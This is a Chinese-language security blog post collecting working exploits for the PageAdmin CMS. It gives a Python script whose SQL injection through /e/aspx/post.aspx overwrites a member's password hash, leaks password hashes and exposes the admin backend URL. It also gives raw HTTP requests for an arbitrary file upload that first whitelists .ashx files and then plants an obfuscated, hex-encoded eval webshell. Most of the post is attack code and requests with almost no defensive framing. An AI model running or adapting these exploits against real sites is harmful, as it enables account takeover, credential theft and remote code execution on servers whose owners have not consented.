Pageadmin漏洞合集


Sql注入

Poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/env python
# -*- coding: utf-8 -*-


import urllib2
import urllib
import re
import sys

def main():
url=sys.argv[1]+"/e/aspx/post.aspx"
fun=sys.argv[2]
if fun=='upass':
update(url)
elif fun=='sqlinject':
sqlinject(url)
elif fun=='Backstage':
Backstage(url)
else:
print'''
usage: pageadminsql.py http://www.baidu.com/ upass
parameter: uppass sqlinject Backstage
'''
def update(url):
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
formate={
"siteid":"1",
"formtable":"1",
"thedata":'[u][k]pa_member[k][s][k]userpassword="1527f10a11de5efea4b8516213413c103df55126"[k]where[k]id=2'
}
postdata = urllib.urlencode(formate)
request = urllib2.Request(url, data=postdata, headers = headers)
try:
response = urllib2.urlopen(request)
if response.getcode()==200:
print u">>>>>>修改密码成功 修改密码:admin_1234213<<<<<<"
pass
except Exception as e:
print u">>>>>>修改密码失败<<<<<<"
pass
def sqlinject(url):
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
formate={
"siteid":"1",
"formtable":"1",
"thedata":"[u][k]article,pa_member[k][s][k]article.title=pa_member.userpassword[k]where[k]article.id=747"
}
postdata = urllib.urlencode(formate)
request = urllib2.Request(url, data=postdata, headers = headers)
try:
response = urllib2.urlopen(request)
if response.getcode()==200:
print u">>>>>>密码注入成功 查看密码地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
pass
except Exception as e:
print u">>>>>>密码注入失败<<<<<<"
pass
def Backstage(url):
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
formate={
"siteid":"1",
"formtable":"1",
"thedata":"[u][k]article,pa_log[k][s][k]article.title=pa_log.url[k]where[k]article.id=747"
}
postdata = urllib.urlencode(formate)
request = urllib2.Request(url, data=postdata, headers = headers)
try:
response = urllib2.urlopen(request)
if response.getcode()==200:
print u">>>>>>后台地址注入成功 查看后台地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
pass
except Exception as e:
print u">>>>>>后台地址注入失败<<<<<<"
pass
if __name__ == '__main__':
main()

前台任意文件上传

漏洞url /e/aspx/upload.aspx?a=pageadmin_cms

先set增加ashx白名单

1
2
3
4
5
6
7
8
9
10
11
POST /e/aspx/upload.aspx?a=pageadmin_cms HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: https://www.safeinfo.me/e/aspx/upload.aspx?a=pageadmin_cms
Host: www.safeinfo.me
Content-Length: 106
Connection: Keep-Alive

submit=1&swf_upload=2&table=pa_field&field=file_ext=".jpg,.jpeg,.gif,.bmp,.ashx" where id=174 and max_num

response包

1
2
3
4
5
6
7
8
9
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Sat, 13 Jul 2019 07:52:02 GMT

<script type='text/javascript'>location.href='?result=cs_error'</script>

再次Post上传shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
POST /e/aspx/upload.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzBItOAbA8GrZ7s49
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: http://www.safeinfo.me/e/aspx/upload_p ... pic&from=master
Host: www.safeinfo.me
Content-Length: 2318


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="file"; filename="005.ashx"
Content-Type: image/jpeg

<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;


public class Handler : IHttpHandler
{
public bool IsReusable
{
get
{
return false;
}
}
public void ProcessRequest(HttpContext context)
{
byte[] b={0x3C, 0x25, 0x40, 0x20, 0x50, 0x61, 0x67, 0x65, 0x20, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3D, 0x22, 0x4A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x22, 0x25, 0x3E, 0x3C, 0x25, 0x65, 0x76, 0x61, 0x6C, 0x28, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2E, 0x49, 0x74, 0x65, 0x6D, 0x5B, 0x22, 0x70, 0x61, 0x73, 0x73, 0x22, 0x5D, 0x2C, 0x22, 0x75, 0x6E, 0x73, 0x61, 0x66, 0x65, 0x22, 0x29, 0x3B, 0x25, 0x3E};
try
{
File.WriteAllBytes(context.Server.MapPath("/e/upload/s1/article/file/")+"/file.aspx",b);
context.Response.Write("oooooooookkkkkkkkk");
}
catch(Exception ex)
{
context.Response.Write(ex.Message);
}
context.Response.End();
}
}
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="width"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="height"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="url"


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="filesize"

0
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="sid"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="type"

file
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="table"

article
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="field"

titlepic
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="from"

master
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49--

最后在response会返回shell地址

------ 本文结束 ------

本文标题:Pageadmin漏洞合集

文章作者:Funny

发布时间:2020年06月29日 - 11:06

最后更新:2020年07月01日 - 00:07

原始链接:http://www.safeinfo.me/2020/06/29/Pageadmin漏洞合集.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

Funny wechat
扫一扫,加入信安圈。
0%